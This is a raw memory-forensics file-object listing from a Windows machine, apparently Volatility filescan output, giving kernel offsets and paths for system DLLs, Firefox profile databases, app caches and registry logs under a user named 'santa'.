+0x918b786c6c90 \Windows\SysWOW64\dwmapi.dll 216 +0x918b786c6e20 \Windows\System32\wbiosrvc.dll 216 +0x918b786c7140 \Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db 216 +0x918b786c7460 \Windows\System32 216 +0x918b786c75f0 \Server 216 +0x918b786c7910 \Windows\System32\winbioext.dll 216 +0x918b786c7aa0 \CMApi 216 +0x918b786c7c30 \Windows\SysWOW64\Windows.UI.Immersive.dll 216 +0x918b786c7dc0 \$Directory 216 +0x918b786c80e0 \Windows\SysWOW64\DXCore.dll 216 +0x918b786c8400 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\AC\Temp\aria-debug-804.log 216 +0x918b786c8590 \Windows\System32\CryptoWinRT.dll 216 +0x918b786c8a40 \Users\santa\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db 216 +0x918b786c8bd0 \Windows\System32\spp.dll 216 +0x918b786c8d60 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b786c8ef0 \Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData 216 +0x918b786c9530 \Windows\System32\InstallService.dll 216 +0x918b786c96c0 \ 216 +0x918b786c9850 \Windows\Registration\R000000000006.clb 216 +0x918b786c99e0 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b786c9b70 \Windows\System32\en-US\UIRibbon.dll.mui 216 +0x918b786c9e90 \$Directory 216 +0x918b786ca1b0 \Windows\System32\en-US\propsys.dll.mui 216 +0x918b786ca340 \$Directory 216 +0x918b786ca4d0 \$Directory 216 +0x918b786ca660 \Windows\System32\SearchFolder.dll 216 +0x918b786ca980 \$Directory 216 +0x918b786caca0 \Users\santa\AppData\Local\Microsoft\Windows\Safety\edge\remote\synchronousLookupUris_638358601691205476 216 +0x918b786cae30 \Windows\SysWOW64\Windows.Globalization.dll 216 +0x918b786cb150 \Windows\System32\en-US\combase.dll.mui 216 +0x918b786cb2e0 \$Directory 216 +0x918b786cb600 \$Directory 216 +0x918b786cb920 \Windows\Registration\R000000000006.clb 216 +0x918b786cbc40 \Users\santa\AppData\Local\Microsoft\Windows\Safety\edge\remote\topTraffic_638004170464094982 216 +0x918b786cbdd0 \Users\santa\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db 216 +0x918b786cc410 \Windows\SysWOW64\mscms.dll 216 +0x918b786cc5a0 \Program Files (x86)\Mozilla Firefox\browser\omni.ja 216 +0x918b786cc8c0 \Users\santa\AppData\Local\Microsoft\Windows\Safety\edge\remote\script_300161259571223429446516194326035503227.rel.v2 216 +0x918b786cca50 \Users\santa\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db 216 +0x918b786ccbe0 \Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_6.0.1.0_x64__8wekyb3d8bbwe\Microsoft.Apps.Stubs.Handoff.dll 216 +0x918b786ccd70 \Windows\SysWOW64\coloradapterclient.dll 216 +0x918b786cd090 \Program Files\WindowsApps\Microsoft.VCLibs.140.00_14.0.32530.0_x64__8wekyb3d8bbwe\vcruntime140_1_app.dll 216 +0x918b786cd220 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db-wal 216 +0x918b786cd3b0 \Program Files\WindowsApps\Microsoft.VCLibs.140.00_14.0.32530.0_x64__8wekyb3d8bbwe\msvcp140_app.dll 216 +0x918b786cd540 \$Directory 216 +0x918b786cd6d0 \$Directory 216 +0x918b786cd860 \Windows\System32\notepad.exe 216 +0x918b786cd9f0 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db-shm 216 +0x918b786cdb80 \$Directory 216 +0x918b786cdd10 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\CacheStorage\CacheStorage.jfm 216 +0x918b786cdea0 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\Settings\settings.dat.LOG1 216 +0x918b786ce1c0 \Windows\Fonts\verdanai.ttf 216 +0x918b786ce350 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\Settings\settings.dat 216 +0x918b786ce4e0 \$Directory 216 +0x918b786ce670 \Windows\Prefetch\CMD.EXE-CD245F9E.pf 216 +0x918b786ce800 \Windows\Fonts\verdanaz.ttf 216 +0x918b786ce990 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db 216 +0x918b786cecb0 \Windows\SysWOW64\dcomp.dll 216 +0x918b786cee40 \$Directory 216 +0x918b786cf160 \$Directory 216 +0x918b786cf2f0 \Windows\System32\webplatstorageserver.dll 216 +0x918b786cf480 \Windows\System32\dllhost.exe 216 +0x918b786cf610 \$Directory 216 +0x918b786cf7a0 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db 216 +0x918b786cf930 \Windows\Fonts\verdanab.ttf 216 +0x918b786cfac0 \Sessions\1\AppContainerNamedObjects\S-1-15-2-2226957697-3030467180-2301525-4248967783-2024719031-2325529081-2915787518 216 +0x918b786d0100 \Windows\System32\winevt\Logs\Microsoft-Windows-Biometrics%4Operational.evtx 216 +0x918b786d0290 \$Directory 216 +0x918b786d0420 \Program Files (x86)\Mozilla Firefox\firefox.exe 216 +0x918b786d05b0 \Reference 216 +0x918b786d0740 \Windows\System32\conhost.exe 216 +0x918b786d08d0 \Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-1046918562-1299961717-1331875240-1001-MergedResources-1.pri 216 +0x918b786d0d80 \Windows\System32\en-US\wscapi.dll.mui 216 +0x918b786d10a0 \Windows\System32\amsiproxy.dll 216 +0x918b786d1230 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\Settings\settings.dat.LOG2 216 +0x918b786d13c0 \$Directory 216 +0x918b786d1550 \Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe 216 +0x918b786d16e0 \CMApi 216 +0x918b786d1a00 \Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\Microsoft.Photos.dll 216 +0x918b786d1eb0 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\cookies.sqlite 216 +0x918b786d2360 \$Directory 216 +0x918b786d24f0 \Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe 216 +0x918b786d2680 \Windows\System32\Windows.Media.MediaControl.dll 216 +0x918b786d2810 \Windows\System32\en-US\dui70.dll.mui 216 +0x918b786d29a0 \Windows\System32 216 +0x918b786d2b30 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\MicrosoftEdge\MSIMGSIZ.DAT 216 +0x918b786d2e50 \Windows\SysWOW64\BCP47Langs.dll 216 +0x918b786d3170 \Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\resources.pri 216 +0x918b786d3490 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b786d37b0 \Windows\Registration\R000000000006.clb 216 +0x918b786d3940 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\Indexed DB\IndexedDB.jfm 216 +0x918b786d3ad0 \Connect 216 +0x918b786d3c60 \Program Files (x86)\Mozilla Firefox 216 +0x918b786d3df0 \Windows\SystemResources\notepad.exe.mun 216 +0x918b786d42a0 \Program Files (x86)\Mozilla Firefox 216 +0x918b786d45c0 \Windows 216 +0x918b786d4c00 \gecko.4576.3988.4014201448364703608 216 +0x918b786d4d90 \gecko.4576.3988.4014201448364703608 216 +0x918b786d50b0 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b786d5240 \Windows 216 +0x918b786d53d0 \Windows\System32\en-US\notepad.exe.mui 216 +0x918b786d5560 \Windows\System32\en-US\Conhost.exe.mui 216 +0x918b786d56f0 \CMApi 216 +0x918b786d5880 \Program Files (x86)\Mozilla Firefox\firefox.exe 216 +0x918b786d5a10 \Windows\System32\en-US\user32.dll.mui 216 +0x918b786d61e0 \Windows\System32\en-US\ESENT.dll.mui 216 +0x918b786d6370 \Program Files (x86)\Mozilla Firefox\freebl3.dll 216 +0x918b786d6500 \Program Files (x86)\Mozilla Firefox 216 +0x918b786d6820 \Program Files (x86)\Mozilla Firefox\softokn3.dll 216 +0x918b786d6b40 \Program Files (x86)\Mozilla Firefox\ipcclientcerts.dll 216 +0x918b786d6cd0 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\permissions.sqlite 216 +0x918b786d6e60 \$Directory 216 +0x918b786d7180 \Windows\System32\MFMediaEngine.dll 216 +0x918b786d7310 \Users\santa\AppData\Local\Microsoft\Internet Explorer\CacheStorage\edb.log 216 +0x918b786d74a0 \$Directory 216 +0x918b786d7630 \Endpoint 216 +0x918b786d77c0 \Program Files (x86)\Mozilla Firefox 216 +0x918b786d7950 \Endpoint 216 +0x918b786d7c70 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 216 +0x918b786d7e00 \Windows\System32\Windows.Networking.HostName.dll 216 +0x918b786d8120 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 216 +0x918b786d82b0 \Windows\SysWOW64\wscapi.dll 216 +0x918b786d8440 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\cookies.sqlite-shm 216 +0x918b786d85d0 \CMApi 216 +0x918b786d8760 \AsyncConnectHlp 216 +0x918b786d88f0 \Windows\System32\RuntimeBroker.exe 216 +0x918b786d8a80 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\ActivationStore.dat 216 +0x918b786d8c10 \Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\AppCoreFramework.Windows.dll 216 +0x918b786d8da0 \Windows\System32 216 +0x918b786d90c0 \Windows 216 +0x918b786d9250 \Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\Lightbox.dll 216 +0x918b786d93e0 \Windows\System32\en-US\d2d1.dll.mui 216 +0x918b786d9890 \Windows\SysWOW64\urlmon.dll 216 +0x918b786d9a20 \Windows\SysWOW64\msmpeg2vdec.dll 216 +0x918b786d9bb0 \Windows\System32\en-US\wbiosrvc.dll.mui 216 +0x918b786d9ed0 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\CacheStorage\CacheStorage.edb 216 +0x918b786da1f0 \$Directory 216 +0x918b786da380 \$Directory 216 +0x918b786da510 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.UI.Xaml.2.7_7.2208.15002.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 216 +0x918b786da6a0 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\Indexed DB\edb.log 216 +0x918b786da830 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.UI.Xaml.2.7_7.2208.15002.0_x64__8wekyb3d8bbwe\ActivationStore.dat 216 +0x918b786da9c0 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.UI.Xaml.2.7_7.2208.15002.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 216 +0x918b786dace0 \Program Files\WindowsApps\Microsoft.UI.Xaml.2.7_7.2208.15002.0_x64__8wekyb3d8bbwe\Microsoft.UI.Xaml.dll 216 +0x918b786dae70 \Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\Utils.dll 216 +0x918b786db190 \Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\SharedServices.dll 216 +0x918b786db320 \Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\ImageEditorLib.dll 216 +0x918b786db4b0 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b786db7d0 \Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\ImageLib.dll 216 +0x918b786db960 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\Indexed DB\IndexedDB.jfm 216 +0x918b786dbaf0 \Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\CoreLib.dll 216 +0x918b786dbc80 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\Indexed DB\IndexedDB.edb 216 +0x918b786dbe10 \$Directory 216 +0x918b786dc130 \CMApi 216 +0x918b786dc2c0 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\Indexed DB\IndexedDB.edb 216 +0x918b786dc450 \ProgramData\Microsoft\Windows\ClipSVC\tokens.dat 216 +0x918b786dc770 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b786dca90 \Windows\System32\WinMetadata\Windows.System.winmd 216 +0x918b786dcdb0 \Windows\Fonts\segoeuii.ttf 216 +0x918b786dd0d0 \CMNotify 216 +0x918b786dd260 \Windows\System32\CompPkgSup.dll 216 +0x918b786dd3f0 \Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1280.db 216 +0x918b786dd580 \Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb 216 +0x918b786dd710 \Windows\System32\en-US\propsys.dll.mui 216 +0x918b786dd8a0 \Windows\Registration\R000000000006.clb 216 +0x918b786ddd50 \Windows\Registration\R000000000006.clb 216 +0x918b786ddee0 \Windows\SysWOW64\wininet.dll 216 +0x918b786de200 \Input 216 +0x918b786de390 \Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.jfm 216 +0x918b786de520 \Output 216 +0x918b786de840 \Windows\Registration\R000000000006.clb 216 +0x918b786decf0 \Users\santa\AppData\Local\Microsoft\Internet Explorer\CacheStorage\edb.log 216 +0x918b786dee80 \Windows\System32 216 +0x918b786df4c0 \Windows\System32\Windows.Media.dll 216 +0x918b786df650 \Windows\System32\en-US\winnlsres.dll.mui 216 +0x918b786df970 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b786dfc90 \$Directory 216 +0x918b786dfe20 \Users\santa\Downloads 216 +0x918b786e0140 \Windows\System32\en-US\mswsock.dll.mui 216 +0x918b786e02d0 \Windows\System32\twext.dll 216 +0x918b786e0460 \Windows\SysWOW64\mfperfhelper.dll 216 +0x918b786e0780 \Users\santa\Downloads 216 +0x918b786e0940 ঘ确醋￿ঘ确醋￿ 0 +0x918b786e0dc0 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\Microsoft\CryptnetUrlCache\MetaData 216 +0x918b786e1400 \Windows\SysWOW64\MMDevAPI.dll 216 +0x918b786e18b0 \CMApi 216 +0x918b786e1a40 \$Directory 216 +0x918b786e1bd0 \Windows\System32\en-US\crypt32.dll.mui 216 +0x918b786e1d60 \Users\santa\Documents 216 +0x918b786e1ef0 \Windows\System32\en-US\twext.dll.mui 216 +0x918b786e2080 \Windows\System32\en-US\crypt32.dll.mui 216 +0x918b786e2210 \Users\santa\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\AC\Microsoft\CryptnetUrlCache\MetaData 216 +0x918b786e23a0 \Users\santa\Documents 216 +0x918b786e2850 \Program Files (x86)\Mozilla Firefox\browser\features\formautofill@mozilla.org.xpi 216 +0x918b786e29e0 \$Directory 216 +0x918b786e2b70 \Windows\System32\en-US\playtomenu.dll.mui 216 +0x918b786e2d00 \$Directory 216 +0x918b786e2e90 \Users\santa\Videos 216 +0x918b786e31b0 \Users\santa\Pictures 216 +0x918b786e3660 \Users\santa\Music 216 +0x918b786e37f0 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\Indexed DB\edb.log 216 +0x918b786e3980 \Users\santa\Pictures 216 +0x918b786e3e30 \Program Files\Windows Photo Viewer\PhotoViewer.dll 216 +0x918b786e4600 \Program Files (x86)\Mozilla Firefox\browser\features\pictureinpicture@mozilla.org.xpi 216 +0x918b786e4790 \Users\santa\Music 216 +0x918b786e4920 \Users\santa\Videos 216 +0x918b786e4ab0 \$Directory 216 +0x918b786e4dd0 \Users\santa\OneDrive 216 +0x918b786e50f0 \Users\santa\OneDrive 216 +0x918b786e5280 \wkssvc 216 +0x918b786e5410 \Windows\System32\en-US\ntshrui.dll.mui 216 +0x918b786e55a0 \Windows\System32\playtomenu.dll 216 +0x918b786e5730 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\key4.db 216 +0x918b786e58c0 \Windows\System32\networkexplorer.dll 216 +0x918b786e5a50 \Windows\SysWOW64\rasadhlp.dll 216 +0x918b786e5be0 \Windows\System32\WinBioDatabase\51F39552-1075-4199-B513-0C10EA185DB0.DAT 216 +0x918b786e6220 \Windows\System32\WinMetadata\Windows.System.winmd 216 +0x918b786e63b0 \Windows\SysWOW64\MP3DMOD.DLL 216 +0x918b786e66d0 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\storage.sqlite 216 +0x918b786e6860 \Windows\Registration\R000000000006.clb 216 +0x918b786e6b80 \Windows\SysWOW64\OnDemandConnRouteHelper.dll 216 +0x918b786e6d10 \$Directory 216 +0x918b786e6ea0 \Windows\SysWOW64\mfplat.dll 216 +0x918b786e7990 \Windows\SysWOW64\MSAudDecMFT.dll 216 +0x918b786e7b20 \Windows\SysWOW64\xmllite.dll 216 +0x918b786e7e40 \Windows\SysWOW64\RTWorkQ.dll 216 +0x918b786e82f0 \LOCAL\cubeb-pipe-4576-0 216 +0x918b786e8930 \Windows\System32\d3d9.dll 216 +0x918b786e8de0 \gecko-crash-server-pipe.4576 216 +0x918b786e9100 \$Directory 216 +0x918b786e9290 \Program Files (x86)\Mozilla Firefox\firefox.exe 216 +0x918b786e95b0 \Windows\System32\winevt\Logs\Microsoft-Windows-WER-PayloadHealth%4Operational.evtx 216 +0x918b786e9740 \$Directory 216 +0x918b786e98d0 \Windows\Fonts\StaticCache.dat 216 +0x918b786e9a60 \$Directory 216 +0x918b786e9d80 \$Directory 216 +0x918b786ea230 \Windows\System32\en-US\tquery.dll.mui 216 +0x918b786ea3c0 \Windows\System32\en-US\cmd.exe.mui 216 +0x918b786ea550 \Windows 216 +0x918b786ea6e0 \Program Files (x86)\Mozilla Firefox\browser\features\webcompat@mozilla.org.xpi 216 +0x918b786ea870 \$Directory 216 +0x918b786eaa00 \Windows\System32\cmd.exe 216 +0x918b786eab90 \Windows\SysWOW64\mf.dll 216 +0x918b786ead20 \$Directory 216 +0x918b786eb360 \Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.jfm 216 +0x918b786eb4f0 \$Directory 216 +0x918b786eb680 \$Directory 216 +0x918b786eb810 \Windows\System32\CompatTelRunner.exe 216 +0x918b786eb9a0 \$Directory 216 +0x918b786ebb30 \Program Files (x86)\Mozilla Firefox\browser\features\screenshots@mozilla.org.xpi 216 +0x918b786ebe50 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b786ec170 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\Microsoft\CryptnetUrlCache\MetaData 216 +0x918b786ec490 \Windows\SysWOW64\d3d11.dll 216 +0x918b786ec620 \gecko.4576.3988.8426202675842789959 216 +0x918b786ec7b0 \Windows\SysWOW64\msdmo.dll 216 +0x918b786ec940 \$Directory 216 +0x918b786ecad0 \Windows\System32\SettingsHandlers_nt.dll 216 +0x918b786ecc60 \gecko.4576.3988.8426202675842789959 216 +0x918b786ecdf0 \ProgramData\Microsoft\Windows\OneSettings\CTAC.json 216 +0x918b786ed110 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\CacheStorage\CacheStorage.edb 216 +0x918b786ed430 \Windows\SysWOW64\winhttp.dll 216 +0x918b786ed5c0 \Windows\System32\en-US\d2d1.dll.mui 216 +0x918b786ed750 \Users\santa\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db 216 +0x918b786ed8e0 \Windows\System32\en-US\winmm.dll.mui 216 +0x918b786eda70 \Windows\SysWOW64\dxva2.dll 216 +0x918b786edc00 \Windows\SysWOW64\evr.dll 216 +0x918b786edd90 \Windows\System32\DeviceCensus.exe 216 +0x918b786ee0b0 \Windows\System32\themeui.dll 216 +0x918b786ee3d0 \Program Files (x86)\Mozilla Firefox\nssckbi.dll 216 +0x918b786ee6f0 \Windows\System32\ErrorDetailsCore.dll 216 +0x918b786ee880 \Windows\SysWOW64\Windows.Security.Integrity.dll 216 +0x918b786eea10 \Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db 216 +0x918b786eeba0 \Windows\System32\MusNotification.exe 216 +0x918b786eeec0 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\CacheStorage\CacheStorage.jfm 216 +0x918b786ef1e0 \Program Files (x86)\Mozilla Firefox 216 +0x918b786ef690 \Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.edb 216 +0x918b786ef820 \Windows\System32\en-US\Conhost.exe.mui 216 +0x918b786ef9b0 \Windows\SysWOW64\d2d1.dll 216 +0x918b786efe60 \Users\santa 216 +0x918b786f0180 \$Directory 216 +0x918b786f0310 \Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.jfm 216 +0x918b786f04a0 \Windows\System32\en-US\webservices.dll.mui 216 +0x918b786f07c0 \Windows\Prefetch\MICROSOFTEDGEUPDATE.EXE-96674210.pf 216 +0x918b786f0950 \Server 216 +0x918b786f0c70 \Reference 216 +0x918b786f1120 \Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.jfm 216 +0x918b786f12b0 \Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.edb 216 +0x918b786f1440 \Windows\System32\en-US\winnlsres.dll.mui 216 +0x918b786f15d0 \Windows\System32\en-US\wininet.dll.mui 216 +0x918b786f2250 \Users\santa\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db 216 +0x918b786f2700 \Windows\System32\conhost.exe 216 +0x918b786f2bb0 \LOCAL\cubeb-pipe-4576-0 216 +0x918b786f2d40 \CMApi 216 +0x918b786f2ed0 \Windows\System32\en-US\shell32.dll.mui 216 +0x918b786f31f0 \$ConvertToNonresident 216 +0x918b786f3380 \Program Files (x86)\Mozilla Firefox\firefox.exe 216 +0x918b786f3510 \$Directory 216 +0x918b786f36a0 \$ConvertToNonresident 216 +0x918b786f3830 \Windows 216 +0x918b786f39c0 \Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_6.0.1.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-1046918562-1299961717-1331875240-1001-MergedResources-1.pri 216 +0x918b786f3b50 \MsFteWds 216 +0x918b786f3e70 \Windows\Registration\R000000000006.clb 216 +0x918b786f4320 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite-wal 216 +0x918b786f4640 \gecko.4576.3988.5212297437992786329 216 +0x918b786f47d0 \gecko.4576.3988.5212297437992786329 216 +0x918b786f4960 \Windows 216 +0x918b786f4af0 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite-shm 216 +0x918b786f4c80 \Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\edb.log 216 +0x918b786f5130 \Connect 216 +0x918b786f52c0 \Windows\System32\en-US\propsys.dll.mui 216 +0x918b786f5450 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite 216 +0x918b786f5770 \Input 216 +0x918b786f5a90 \Output 216 +0x918b786f5c20 \Windows\System32\winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx 216 +0x918b786f63f0 \$Directory 216 +0x918b786f68a0 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\Ecs.dat 216 +0x918b786f6a30 \Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_6.0.1.0_x64__8wekyb3d8bbwe\Microsoft.Notes.Upgrade.dll 216 +0x918b786f6d50 \Windows\System32\en-US\usosvc.dll.mui 216 +0x918b786f7200 \Windows\System32\WinMetadata\Windows.Web.winmd 216 +0x918b786f7520 \Windows 216 +0x918b786f7840 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\DiagOutputDir\log-2023-11-17-15-54-57-0.txt 216 +0x918b786f79d0 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b786f7b60 \Windows\System32\WordBreakers.dll 216 +0x918b786f7e80 \Windows\System32\en-US\mswsock.dll.mui 216 +0x918b786f8330 \Connect 216 +0x918b786f87e0 \Windows\SystemResources\imageres.dll.mun 216 +0x918b786f8e20 \Program Files (x86)\Mozilla Firefox\osclientcerts.dll 216 +0x918b786f9460 \Windows\SysWOW64\ntasn1.dll 216 +0x918b786f95f0 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\cookies.sqlite-wal 216 +0x918b786f9910 \Windows\System32\en-US\dnsapi.dll.mui 216 +0x918b786f9aa0 \Windows\System32\en-US\crypt32.dll.mui 216 +0x918b786f9dc0 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\AC\Microsoft\CryptnetUrlCache\MetaData 216 +0x918b786fa0e0 \Windows\Logs\CBS\CBS.log 216 +0x918b786fa400 \Windows\SysWOW64\OneCoreUAPCommonProxyStub.dll 216 +0x918b786fa720 \Windows\Fonts\segoeui.ttf 216 +0x918b786faa40 \Windows\SysWOW64\avrt.dll 216 +0x918b786fabd0 \MmThread 216 +0x918b786faef0 \CMApi 216 +0x918b786fb080 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\cookies.sqlite 216 +0x918b786fb3a0 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\cookies.sqlite-shm 216 +0x918b786fb530 \Windows\Fonts\segoeui.ttf 216 +0x918b786fb6c0 \Windows\SysWOW64\ncrypt.dll 216 +0x918b786fbd00 \Windows\System32\wosc.dll 216 +0x918b786fbe90 \Windows\SysWOW64\Windows.StateRepositoryCore.dll 216 +0x918b786fcca0 \CMNotify 216 +0x918b78d25d20 \Windows\System32\drivers\bindflt.sys 216 +0x918b78d2f580 \Device\HarddiskVolume4\Windows\System32\config\COMPONENTS{fd9a35c2-49fe-11e9-aa2c-248a07783950}.TxR 216 +0x918b78d31ae0 \Windows\System32\config\COMPONENTS{fd9a35c2-49fe-11e9-aa2c-248a07783950}.TxR.blf 216 +0x918b78d365a0 \Windows\System32\config\COMPONENTS{fd9a35c2-49fe-11e9-aa2c-248a07783950}.TxR.0.regtrans-ms 216 +0x918b78d3bbe0 \Windows\System32\config\COMPONENTS{fd9a35c2-49fe-11e9-aa2c-248a07783950}.TxR.1.regtrans-ms 216 +0x918b78d3ce90 \Windows\System32\config\COMPONENTS{fd9a35c2-49fe-11e9-aa2c-248a07783950}.TxR.2.regtrans-ms 216 +0x918b78d4a350 \Windows\System32\config\DRIVERS 216 +0x918b78d4abf0 \Windows\System32\config\DRIVERS.LOG2 216 +0x918b78d4b770 \Windows\System32\config\DRIVERS{fd9a35cb-49fe-11e9-aa2c-248a07783950}.TM.blf 216 +0x918b78d4b8e0 \Windows\System32\config\DRIVERS{fd9a35cb-49fe-11e9-aa2c-248a07783950}.TMContainer00000000000000000001.regtrans-ms 216 +0x918b78d4ba50 \Windows\System32\config\DRIVERS.LOG1 216 +0x918b78d4bd30 \Windows\System32\config\DRIVERS{fd9a35cb-49fe-11e9-aa2c-248a07783950}.TMContainer00000000000000000002.regtrans-ms 216 +0x918b78d4e850 \Windows\Logs\WindowsUpdate\WindowsUpdate.20231117.155111.221.2.etl 216 +0x918b78d4f540 